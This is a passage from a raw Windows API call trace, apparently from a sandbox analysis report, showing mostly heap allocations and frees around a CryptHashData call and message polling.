RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51460 [0258.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51460, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0258.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0258.391] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0258.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0258.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0258.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0258.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0258.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0258.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0258.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0258.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0258.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0258.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0258.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0258.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0258.392] CryptHashData (hHash=0xa87310, pbData=0x2e55078, dwDataLen=0x3, dwFlags=0x1) returned 1 [0258.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0258.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0258.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0258.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0258.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0258.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0258.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0258.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0258.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0258.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0258.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0258.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0258.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0258.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0258.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0258.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0258.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0258.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0258.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0258.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0258.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0258.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0258.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0258.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0258.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0258.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0258.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0258.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0258.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0258.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0258.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0258.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0258.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0258.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0258.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0258.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0258.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0258.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0258.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0258.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0258.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0258.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0258.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0258.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0258.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0258.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0258.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0258.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0258.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0258.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0258.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0258.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0258.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0258.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0258.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0258.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0258.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0258.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0258.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0258.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0258.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0258.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0258.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0258.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0258.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0258.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0258.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0258.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0258.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0258.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0258.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0258.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0258.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0258.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0258.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0258.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0258.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0258.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0258.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0258.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0258.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0258.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978270 [0258.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0258.395] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0258.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0258.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0258.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0258.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0258.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0258.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0258.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0258.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0258.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0258.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0258.395] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0258.395] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0258.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0258.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0258.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0258.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b90 [0258.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0258.396] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0258.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b90 | out: hHeap=0x970000) returned 1 [0258.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0258.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51658 [0258.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0258.396] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0258.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0258.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0258.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0258.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0258.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0258.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0258.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0258.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0258.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0258.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0258.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0258.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0258.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0258.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0258.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0258.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0258.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0258.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0258.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0258.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0258.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0258.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0258.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0258.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0258.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0258.397] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0258.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0258.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0258.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51670 [0258.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0258.397] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0258.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0258.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0258.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0258.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0258.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0258.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0258.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0258.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0258.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0258.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0258.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0258.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0258.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0258.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0258.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0258.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0258.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0258.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0258.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0258.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0258.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0258.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0258.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0258.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0258.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0258.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0258.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0258.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0258.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0258.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0258.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0258.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0258.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0258.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0258.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0258.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0258.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0258.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0258.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0258.398] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0258.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0258.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0258.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0258.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0258.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0258.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0258.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0258.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0258.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0258.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0258.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0258.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0258.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0258.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0258.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0258.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0258.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0258.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0258.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0258.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0258.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0258.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0258.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0258.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0258.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0258.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0258.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0258.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0258.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0258.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0258.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0258.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0258.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0258.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0258.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0258.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0258.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0258.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0258.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0258.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0258.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0258.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0258.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0258.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0258.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0258.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0258.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0258.400] 